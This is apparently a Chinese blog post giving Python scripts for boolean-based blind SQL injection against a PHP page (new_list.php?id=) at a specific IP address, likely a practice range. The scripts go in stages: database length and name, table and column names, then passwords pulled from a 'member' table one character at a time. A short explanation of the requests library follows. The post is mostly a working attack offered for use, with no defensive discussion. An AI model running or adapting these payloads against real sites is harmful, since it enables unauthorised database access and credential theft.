首页 > 数据库 >sql布尔盲注脚本

sql布尔盲注脚本

时间:2023-11-10 21:35:18浏览次数:40  
标签:url re range str sql print 盲注 payload 布尔

数据库长度

from requests import *
r=session()
url = 'http://124.70.71.251:40332/new_list.php?id=1 and length(database())='
for i in range(20):
    url1=url+str(i)
    re=r.get(url1)
    if "2018" in re.text:
        print(i)

数据库名称

from requests import *
r=session()
url = 'http://124.70.71.251:40545/new_list.php?id=1 and '
for i in range(10):
    for j in range(48,128):
        payload=url+'ascii(substr(database(),'+str(i)+',1))='+str(j)+"--+"
        re=r.get(payload)
        if "2018" in re.text:
            print(chr(j),end='')

数据库表数量

from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(20):
    payload = url + "(select count(table_name) from information_schema.tables where table_schema='stormgroup')=" + str(i) + "--+"
    re = r.get(payload)
    if '2018' in re.text:
        print(i)

数据库表名

from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(20):
    for j in range(2):
        payload = url + "length((select table_name from information_schema.tables where table_schema='stormgroup' limit " + str(j) + ",1))=" + str(i) + "--+"
        re = r.get(payload)
        if "2018" in re.text:
            print(i)

字段数量

from requests import *
r=session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(10):
    payload=url+"(select count(column_name) from information_schema.columns where table_schema='stormgroup' and table_name='member')="+str(i)+" --+"
    re=r.get(payload)
    if "2018" in re.text:
        print(i)

字段名

from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for k in range(3):
    for j in range(10):
        for i in range(47, 128):
            payload = url + "ascii(substr((select column_name from information_schema.columns where table_name='member' limit "+str(k)+",1)," + str(
                j) + ",1))=" + str(i) + "--+"
            re = r.get(payload)
            if "2018" in re.text:
                print(chr(i), end="")
    print("\n")

爆破表中密码

from requests import *
r=session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(3):
    for j in range(50):
        for k in range(48, 128):
            payload = url + "ascii(substr((select password from member limit "+str(i)+",1)," + str(j) + ",1))=" + str(k) + " --+"
            re = r.get(payload)
            if "2018" in re.text:
                print(chr(k), end="")
    print("\n")

对一些代码做一下解释:

r=session():它的作用是创建一个新的会话对象,该对象可以用于管理与远程服务器之间的连接和请求。通过使用会话对象,你可以保持一些状态信息,例如cookies、headers等,以便在不同的请求之间共享。

re.text:直接输出 re 对象会显示该对象的默认字符串表示形式,通常是一个包含响应头和状态信息的字符串。这个字符串对于理解响应的整体结构可能是有帮助的,但如果你只关心响应的主体内容,那么使用 re.txt 会更加方便和直观。

比如:

 

import requests

url = 'https://www.example.com'
response = requests.get(url)

print(response)
//输出
//<Response [200]>

 

 

 

 

标签:url,re,range,str,sql,print,盲注,payload,布尔
From: https://www.cnblogs.com/lcjingyi/p/17825098.html

相关文章

  • Java登陆第三天——SQL之DQL
    SQL语句SQL概括起来可以分为以下四组。(都是SQL,因为功能的不同,为了更好学习划分了类别)DDL——数据定义语言。用于定义数据的结构。指的是增,删,改数据库DML——数据操作语言。用于检索或修改数据。指的是增,删,改数据DQL——数据查询语言。用于查询各种形式的数据。指的是查询......
  • MySql与SQLServer数据库基础语法差异;
    1.应用Native工具将数据同步,将数据库结构和同步到MySql。视图、存储过程、函数手动创建。 2.移除数据所有数据查询的数据框架标识"dbo"; 3.MySQL中IFNULL用法,用法与SQLServer中ISNULL(expr1,expr2)用法相似.,而MySql中isnull()的返回值为1,否则返回值为0; 4.sqlserver的识别符......
  • 【mysql 1045错误】
    【mysql1045错误】1.请确认检查账户密码均正确!2.ip地址没有访问这个库的权限解决办法:进行授权1)mysql8以下的添加方式#创建用户|在root@'%'增加一个任意地址可以访问的用户root|identifiedby'密码';1grantallprivilegeson*.*toroot@'%'identifiedby'your......
  • 一文带你玩转SQL中的DML(数据操作)语言:从概念到常见操作大解析!数据操作不再难!
    前面我们介绍了SQL语句中数据定义语言(DDL)的概念以及它的常用语句,那么DML又是什么呢?二者有什么区别呢?本篇文章将为你讲述。一、DML简介DML是指数据操作语言,英文全称是DataManipulationLanguage,用来对数据库中表的数据记录进行更新。它创建的模式(表)使用数据操作语言来填充。DDL......
  • Mysql8.0 导出文件导入到 5.7
    1:创建的数据库要和导出文件编码一致,如下图 2:查看是否有其他编码如下图: 3:Invaliddefaultvaluefor'LOCK_TIME_' 报错更改mysql的my.ini 文件 设置explicit_defaults_for_timestamp=ON  重启mysqlC:\ProgramData\MySQL\MySQLServer5.7......
  • Sql server基础使用(六):补充零碎的一些东西(想到什么就补充,未完待续~~)
    对所学Sqlserver知识进行一下记录总结,某些用法之间还可以关联使用,欢迎补充和讨论。本人比较懒,结果的截图暂时就先不传了,什么时候想起来再说吧~~在写存储过程之前,先补充一些比较零碎的东西,有些在存储过程中会用到。就想到什么写什么吧,有时间就补充~~未完待续~~1.定义变量(我一般......
  • 字符集collation不同-隐式转换mysql
    适用范围1.适用于MySQL或者OceanbaseforMySQL2.适用于两表或多表join的字段字符序不同的场景。如本例:COLLATEutf8mb4_general_ci和COLLATEutf8mb4_bin`cust_no`varchar(30)CHARACTERSETutf8mb4COLLATEutf8mb4_general_ci`cust_no`varchar(100)CHARACTERSETu......
  • 一文带你玩转SQL中的DML(数据操作)语言:从概念到常见操作大解析!数据操作不再难!
    前面我们介绍了SQL语句中数据定义语言(DDL)的概念以及它的常用语句,那么DML又是什么呢?二者有什么区别呢?本篇文章将为你讲述。一、DML简介DML是指数据操作语言,英文全称是DataManipulationLanguage,用来对数据库中表的数据记录进行更新。它创建的模式(表)使用数据操作语言来填充。DD......
  • 解决MySQL8报错:Public Key Retrieval is not allowed
    问题分析:这个是由于配置的URL中的useSSL为false导致的,当其为false后,mysql将会检查allowPublicKeyRetrieval是不是TRUE,由于开启allowPublicKeyRetrieval不安全可能遭到中间人攻击(英语:Man-in-the-middleattack,缩写:MITM),所以allowPublicKeyRetrieval的值默认为false。两项都为false后......
  • MySQL数据库进阶实战:优化性能、提高安全性和实现高可用性
    当涉及到MySQL数据库的进阶实战时,有许多方面需要考虑,包括性能优化、安全性、高可用性和复杂查询等。以下是一个关于MySQL数据库进阶实战的文章大纲,您可以根据需要进行扩展和详细说明。MySQL数据库进阶实战:优化性能、提高安全性和实现高可用性引言MySQL是一款广泛使用的开源关系型数......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99